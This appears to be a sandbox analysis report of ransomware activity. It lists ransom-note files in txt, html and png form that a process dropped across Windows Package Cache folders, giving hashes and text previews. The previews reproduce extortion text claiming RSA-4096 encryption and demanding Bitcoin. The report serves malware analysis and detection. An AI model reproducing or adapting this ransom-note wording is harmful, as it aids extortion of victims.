                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
